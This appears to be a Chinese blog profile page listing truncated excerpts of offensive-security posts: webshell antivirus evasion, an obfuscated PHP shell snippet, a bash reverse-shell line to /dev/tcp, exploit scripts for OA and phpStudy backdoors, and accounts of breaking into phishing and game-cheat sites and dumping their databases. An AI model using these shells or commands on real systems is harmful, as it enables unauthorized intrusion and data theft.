2 yzddMr6

尚未进行身份认证

yzddmr6.tk

等级
TA的排名 59w+

WebShell免杀之JSP ——yzddMr6

文章地址:https://yzddmr6.tk/posts/webshell-bypass-jsp/由于JSP的语法没有所谓的eval函数,不像php等语言那么灵活,变形困难,所以JSP的免杀马比较少,相关的文章也比较少。不过方法少并不代表没有,参考前辈们的文章自己也总结了一些。image.png这里贴出来一个样例<%@ page contentType...

2020-02-18 08:21:32

一个有趣的Shell分析以及自己的一些想法 ——yzddMr6

前言前一段时间有很多同学问我这个shell,看了下确实比较有意思,并且顺便也想讲一些自己的想法。<?php$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p...

2019-12-17 22:07:01

绕过宝塔云锁注入钓鱼站 ——yzddMr6

前言某天收到一封邮件image一看就是钓鱼邮件,并且我也不玩LOL。看了看感觉这个系统好像见过很多次,研究了一下,顺手日了下来过程比较有意思,遇到了不少坑,写篇文章记录一下。正文信息搜集打开网站首先我们可以看到他的炫酷界面image进一步搜集信息发现有宝塔+云锁,找不到后台,旁站全是这种钓鱼站,均使用了冒充官网的子域名前缀im...

2019-12-07 09:53:22

反弹Shell升级为交互式Shell ——yzddMr6

前言看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。然后一顿操作把一个简单的shell就升级到了一个标准交互式shell写这篇文章记录一下正文攻击机:kali靶机:ubuntu首先ubuntu建一个新用户:test,密码 test普通Shell给kali弹shellbash -i >& /dev/tcp/192.168...

2019-12-03 13:14:56

利用随机异或无限免杀d盾 ——yzddMr6

前言最近D盾更新了,在某司某圈也看到了不少免杀d盾免杀狗的一句话帖子但是基本上只要放出来不到两天时间就加入查杀全家桶.最近一直在造各种车轮子就想着其实可以写个脚本利用异或来fuzz出指定的字符然后拼接出assert或者create_function等函数,来对抗waf的检测.思路及实现首先如何fuzz的问题先讲一个离散数学中的概念叫可逆 ,异或的运算就是具有可逆性的.具体什么意思呢...

2019-11-19 22:30:52

无限免杀D盾脚本之aspx ——yzddMr6

前言自己曾经写过一篇文章:利用随机异或无限免杀某盾php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀0x01 主要方法字符串拼接函数数组Base64编码0x02 了解aspx一句话Aspx的一句话一般是使用Jscript语言实...

2019-11-19 22:27:52

WebCrack:一键自动化日站工具 ——yzddMr6

前言当初日学校内网的时候有很多后台,就想着能不能批量检测一下弱口令但是学校的后台系统种类很多,asp aspx php jsp 等等因为单个网站的爆破比较好整,直接上burp或者py脚本或者hydra好像还没有听说过批量工具想着找一找有没有现成的工具能测一测。还真发现github上有一个https://github.com/TideSec/web_pwd_common...

2019-11-19 22:23:34

向吃鸡外挂站开炮(二)——yzddMr6

上一篇 向吃鸡外挂站开炮(一)前言首先打开网站我们可以看到他的炫酷界面暖心公告[图片上传失败…(image-cea3c9-1573117670522)]不要脸的宣传词发现注入基于tp3开发,后台/admin尝试万能密码提示密码错误尝试admin admin888 提示账号不存在两者回显不同,考虑可能存在注入无法利用?burp抓包发送到repeater进行...

2019-11-15 15:36:12

向吃鸡外挂站开炮(一) ——yzddMr6

前言因为最近吃鸡被外挂打自闭了,所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台你们这些卖挂的,等我有空了一个一个捶。发现大多数都是用的一套aspx的程序,可惜没有源码不能白盒审计,黑盒也找不到什么洞只能找找软柿子捏昨天晚上一口气锤了四个基本上都有宝塔不过php-venom 4 系列加上配套的编码器过宝塔稳得一批脱了裤子发现里面...

2019-11-15 15:34:16

向吃鸡外挂站开炮(三)——yzddMr6

本篇已授权公众号“HACK学习呀”转载向吃鸡外挂站开炮(一)向吃鸡外挂站开炮(二)前言第三篇终于写好了,也算是比较有意思的一篇,遇到了很多坑,也用上了很多小技巧,写出来博君一笑。正文毫无套路的炫酷界面image琳琅满目的商品列表image这种卖黑号的通常都是跟各种hc商勾结在一起,用木马盗取用户账号,然后再出售账号让孤儿开挂。Getsh...

2019-11-14 20:11:24

2019“黄鹤杯”全国总决赛 WEB Write Up ——yzddMr6

前言三天赶了两场比赛黄鹤杯体验极佳 ,比某500空间好到不知哪里去了web就两个题,一开始就打穿了于是本菜鸡就开始了划水运动hhhhhweb1web1是个thinkphp5扫一下目录有个www.zip打开后看到源码image有注册 有登录按钮,然后看源码的意思是让你成为admin用户,然后可以得到一个hint来进行下一步...

2019-11-09 19:36:48

如何优雅的把cmdshell升级为一句话 ——yzddMr6

前言前一段时间致远OA的洞坑了不少公司自己也复现了一下 但是有个很恶心的问题就是 默认的payload是有长度限制的并且只是一个cmd的shellLinux的shell还比较灵活 但是win的来说就不太方便了特别是配合上恶心的url编码在浏览器里面遇到反斜杠就gg那么怎么把cmdshell优雅的转化为可以连接的一句话呢看了以前的帖子大概有这几个办法Js+cscr...

2019-11-09 19:35:05

泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6

使用方法python3 rce.py http://www.baidu.comimagepayload是捡的,可以一定程度上bypass waf源码随手撸的import requestsimport sysheaders = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1...

2019-11-09 19:33:40

phpstudy 后门批量利用脚本改良版 ——yzddMr6

前言看到新闻后本来以为影响范围小没多大事。。。直到发现自己的两个电脑全都中招了才意识到问题大了。。。不过还好自己当初安装phpstudy后第一时间关了对外端口,只允许本地127.0.0.1访问并且用的一直是php5.6,完美避开两个后门版本如果不是新闻爆出来谁能想到这玩意还有后门。。。awsl,这谁顶得住啊。后门检测后门版本:phpStudy2016 和 phpS...

2019-11-07 17:00:02

webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言感谢大家对webshell-venom的支持星球自开启以来已经源源不断有各路大佬加入并且一起交流了很多的思路跟想法为了不辜负大家的期望自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更项目在今天也达到了700个星image所以特地推出webshell-venom 3.2版本webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商...

2019-11-07 16:47:30

hexo-hey 修改上传图片为相对路径 ——yzddMr6

前言做个记录正文自己的博客采用了hexo-hey来管理,还是挺方便的。但是一直有个问题就是上传图片的问题。如果你在站点主配置文件中设置了urlimagehexo-hey就会默认把你在本地编辑图片的路径前面加上你的url所以就变成了这个样子image因为你是在localhost调试后才发布出去,所以此时你的网站上并没有这张图片所以就出现了...

2019-11-07 16:44:12

WebCrack:网站后台弱口令批量检测工具 ——yzddMr6

经过这么长时间的测试终于算是可以上线了,写篇文章跟大家分享一下自己的开发思路吧注:本工具借鉴吸收了TideSec的web_pwd_common_crack很多优秀的思路,在此基础上增加了很多拓展功能使其更加强大,在这里给TideSec的大佬点个赞!前言在做安全测试的时候,随着资产的增多,经常会遇到需要快速检测大量网站后台弱口令的问题。然而市面上并没有一个比较好的解决...

2019-11-06 14:48:24

一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6

前言我承诺过300个星后放出3.0项目地址:https://github.com/yzddmr6/webshell-venomwebshell-venom 3.0 更新特点:1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加2. 变量全员随机化,不再有固定的变量名称3. 增...

2019-11-06 14:43:54

一键免杀D盾(免杀一句话无限生成) ——yzddMr6

前言最近逛帖子发现好多人还在找各种免杀一句话。。。都9102年了 都不知道有webshell-venom这个东西吗。。。看来我的宣传还是不到位。。。再给大家介绍一下吧项目地址:https://github.com/yzddmr6/webshell-venom蚁剑插件版:https://github.com/yzddmr6/as_webshell_venom自己几个...

2019-11-06 14:41:54

利用随机异或无限免杀d盾 2.0 ——yzddMr6

随机异或脚本 2.0更新内容1. 更新免杀2. 解决了PHP5.4以下没有hex2bin函数的BUG3. 在变量池中去除导致脚本不能使用的转义符\4. 精简体积 370字节->270字节5. Header改为404,更为隐蔽其实上一篇文章写之前就已经有了心理准备上次发的脚本自己用了几个月没事发出来不到一个星期就不免杀了image...

2019-11-06 14:40:20

查看更多

勋章 我的勋章
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。